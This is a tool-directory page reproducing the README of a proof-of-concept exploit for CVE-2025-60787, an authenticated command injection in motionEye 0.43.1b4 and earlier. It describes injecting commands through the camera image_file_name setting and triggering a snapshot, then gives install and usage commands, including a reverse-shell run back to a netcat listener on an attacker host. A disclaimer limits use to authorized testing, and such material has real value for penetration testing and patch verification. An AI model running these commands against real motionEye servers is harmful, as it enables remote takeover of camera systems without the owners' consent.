Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-60787 — CVE-2025-60787 motionEye authenticated command injection RCE PoC | Kitploit
Tools/GitHubGitHub/ozcanpng/cve-2025-60787
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingCommand and ControlRed Teaming
GitHubozcanpng/cve-2025-60787

CVE-2025-60787

CVE-2025-60787 motionEye authenticated command injection RCE PoC

View Repository
82 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2025-60787 — motionEye Authenticated RCE

Authenticated command injection PoC for CVE-2025-60787. motionEye v0.43.1b4 and earlier write user-controlled camera configuration values such as image_file_name into Motion configuration without sufficient sanitization, allowing command execution when the value is processed.

For authorized testing and research only. Do not use against systems you do not own or have explicit permission to test.


What it does

Signed API request -> camera config update -> image_file_name injection -> snapshot trigger -> command execution
  1. Validates the target and detects motionEye.
  2. Generates signed motionEye API requests using the configured username and password hash.
  3. Reads camera configuration through /config/list/.
  4. Injects a command into the camera image_file_name setting.
  5. Enables still images/manual snapshots where needed.
  6. Triggers /action/<camera_id>/snapshot/ so motionEye processes the injected filename.
  7. Optionally restores the original camera configuration.

Screenshots

Reverse shell setup

Reverse shell setup

Configuration injection and trigger

Configuration injection and trigger

Shell received

Shell received


Setup

git clone https://github.com/ozcanpng/CVE-2025-60787.git
cd CVE-2025-60787
pip install -r requirements.txt

Usage

Safe command proof

python3 CVE-2025-60787.py \
  --target http://127.0.0.1:8765 \
  --user admin \
  --password-hash HASH \
  --cmd 'id > /tmp/motioneye_rce'

Reverse shell

Start a listener first:

rlwrap nc -lvnp 4444

Then run:

python3 CVE-2025-60787.py \
  --target http://127.0.0.1:8765 \
  --port 8765 \
  --user admin \
  --password-hash HASH \
  --reverse-shell \
  --lhost 10.10.16.53 \
  --lport 4444

Useful options:

--camera-id N      Camera ID to modify (default: 1)
--restore          Restore the original camera configuration after triggering
--dry-run          Build signed requests without modifying the target
--debug            Print canonical signed paths, bodies and signatures
--no-trigger       Update config without triggering a snapshot
--verify-tls       Verify HTTPS certificates
--yes              Skip reverse-shell confirmation prompt

Affected

ProductAffected VersionAccess RequiredImpact
motionEye<= 0.43.1b4Authenticated admin/API accessOS command execution as the motionEye/Motion process user

The resulting privilege depends on how motionEye is deployed. In containers or lab images running the service as root, command execution can land as root.


Notes

  • The PoC expects the stored motionEye password value/hash because that value is used as the signing key for legacy API requests.
  • The injected field is image_file_name.
  • Use --restore during testing to put the original camera configuration back after exploitation.
  • Prefer --cmd for safe validation before attempting a reverse shell.

References

  • NVD — CVE-2025-60787
  • GitHub Security Advisory — GHSA-j945-qm58-4gjx
  • motionEye project

Author

ozcanpng — github.com/ozcanpng — ozcanpng.dev

Download Tool